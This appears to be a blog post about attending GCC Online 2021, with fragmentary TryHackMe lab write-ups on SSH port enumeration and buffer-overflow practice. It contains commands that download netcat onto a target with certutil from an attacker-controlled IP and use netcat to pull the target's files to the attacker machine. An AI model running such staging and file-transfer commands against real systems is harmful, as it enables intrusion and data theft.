This is my writing on joining GCC Online 2021
GCC is an annual 1-week international cybersecurity training program.
Each participating country takes responsibility to host each annual edition. (Source: https://www.div0.sg/gcc)
Strengthen the security community across Asia and nurture future global leaders. Annually, the best 48 students (maximum) from member countries gather in one of the participating countries for a week to exchange experiences, forge a life-long friendship, and learn from the best cybersecurity professionals. Non-commercial education programs and communities organize the program supported by industry leaders who care about the safe digitalization of the world.
Step through the looking glass. A sequel to the Wonderland challenge room.
Let’s do nmap first and see what do we get.
There are thousands port are open within range of 9000 to 14000
Since there are thousands of ports are open and all of these are ssh. Let's try manual first instead of doing the automation script. When we ssh to a port there is two outputs that we will get which Higher and Lower.
Practice stack-based buffer overflows!
I did not use the RDP inside TryHackMe, instead, I download all the files needed on the machine and put in my own Windows.
First, upload our nc.exe on that machine because I can't find nc on the machine,
certutil -urlcache -f http://<IP>/nc.exe c:\Users\admin\Desktop\nc.exe
Then I just use NC to transfer files. I don't know how to transfer all directory so instead, I just transfer each one inside the vulnerable-apps directory.
#On Our Machine
nc -l -p 1234 > oscp.exe#On Target Machine
nc.exe -w 3 <IP> 1234 < vulnerable-apps\oscp\oscp.exe
Keep doing that and let’s do…